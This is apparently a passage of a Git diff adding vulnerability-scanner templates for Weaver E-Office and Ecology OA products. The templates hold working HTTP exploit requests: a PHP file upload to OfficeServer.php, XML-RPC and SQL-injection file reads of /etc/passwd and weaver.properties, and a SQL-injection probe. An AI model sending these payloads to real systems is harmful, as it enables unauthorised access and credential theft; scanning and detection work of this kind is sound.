- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java
- https://github.com/Phuong39/2022-HW-POC/blob/main/泛微%20EOffice10%20前台%20GETSHELL.md
- http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20OfficeServer.php%20任意文件上传漏洞.html
tags: weaver,e-office,oa,sqli
http:
- raw:
- |
POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLpoiBFy4ANA8daew
Upgrade-Insecure-Requests: 1
------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition: form-data;name="FileData";filename="teest.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition: form-data;name="FormData"
{'USERNAME':'admin','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'teest.php'}
------WebKitFormBoundaryLpoiBFy4ANA8daew--
- raw:
- |
GET /eoffice10/server/public/iWebOffice2015/Document/teest.php
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "phpinfo"
- type: status
status:
- 200
# shell http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php
# POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
# Host: XXXXXXXX:8010
# Content-Length: 378
# Cache-Control: max-age=0
# Upgrade-Insecure-Requests: 1
# Origin: null
# Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
# Gecko) Chrome/91.0.4472.77 Safari/537.36
# Accept:
# text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
# *;q=0.8,application/signed-exchange;v=b3;q=0.9
# Accept-Encoding: gzip, deflate
# Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
# Connection: close
# ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
# Content-Disposition: form-data; name="FileData"; filename="1.jpg"
# Content-Type: image/jpeg
# <?php echo md5(1);?>
# ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
# Content-Disposition: form-data; name="FormData"
# {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}
# ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--

33
http/vulnerabilities/weaver/weaver-e-office-xmlrpcservlet-arbitrary-file-read.yaml Executable file
View File

@ -0,0 +1,33 @@
id: weaver-e-office-xmlrpcservlet-arbitrary-file-read
info:
name: weaver-e-office-xmlrpcservlet-arbitrary-file-read
author: SleepingBag945
severity: high
description: 通过漏洞攻击者可以获取敏感信息
tags: weaver,e-office,oa,sqli
http:
- raw:
- |
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/xml
Accept-Encoding: gzip
<?xml version="1.0" encoding="UTF-8"?><methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params><param><value><string>/etc/passwd</string>
</value></param></params></methodCall>
matchers-condition: and
matchers:
- type: word
words:
- "<methodResponse><params><param><value><base64>"
- type: status
status:
- 200

36
http/vulnerabilities/weaver/weaver-e-weaver-signaturedownload-arbitrary-file-read.yaml Executable file
View File

@ -0,0 +1,36 @@
id: weaver-e-weaver-signaturedownload-arbitrary-file-read
info:
name: weaver-e-weaver-signaturedownload-arbitrary-file-read
author: SleepingBag945
severity: high
description: 泛微OA E-Weaver SignatureDownLoad接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器任意文件
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Weaver%20SignatureDownLoad%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DriverClasses"
- type: word
part: body
words:
- "ecology.password"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31

29
http/vulnerabilities/weaver/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml Normal file
View File

@ -0,0 +1,29 @@
id: weaver-ecology-oa-plugin-checkserver-setting-sqli
info:
name: 泛微 Ecology OA CheckServer SQL 注入漏洞
author: SleepingBag945
severity: high
description: 泛微 Ecology OA 系统由于对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,远程且未经过身份认证的攻击者可利用此漏洞进行 SQL 注入攻击,从而可窃取数据库敏感信息。
tags: weaver,ecology
http:
- raw:
- |
GET /mobile/plugin/CheckServer.jsp?type=mobileSetting HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
matchers:
- type: dsl
dsl:
- status_code == 200
- '!contains(header,"securityIntercept")'
- 'contains(header,"application/json")'
- contains(body,"\"error\":\"system error\"")
condition: and
# http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html

Some files were not shown because too many files have changed in this diff Show More